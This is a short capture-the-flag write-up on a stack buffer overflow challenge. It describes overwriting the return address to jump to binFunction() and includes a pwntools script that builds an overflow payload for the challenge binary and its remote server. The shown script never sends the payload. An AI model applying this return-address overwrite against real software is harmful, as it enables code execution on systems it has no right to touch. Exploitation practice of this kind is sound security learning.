This is the 3rd buffer overflow
challeng, and it couldn't be done without some gdb
The source¶
As you can see, we don't get another variable for us to overflow, instead we have a function in outside main. This case, we want to alter therip
registerto the address of binFunction()
so we can get that running.
First of all, we need to find the return address of main
and the address of binFunction()
Finding Addresses (manual)¶
We can use gdb
to help us.
The exploit¶
I wrote a python script(for this one, to automate it) to find the binFunction
address and automatically generate and send the payload.
from pwn import *
import sys
context(os='linux', arch='i386')
local = "./coffer-overflow-2"
host,port = "",31908
conn = remote(host,port)
elf = ELF(local)
binFunction = elf.symbols["binFunction"]
size = 0x10+8
payload = "A"*size
payload += p64(binFunction)
The flag¶
As usual, we can cat out the flag in the shell.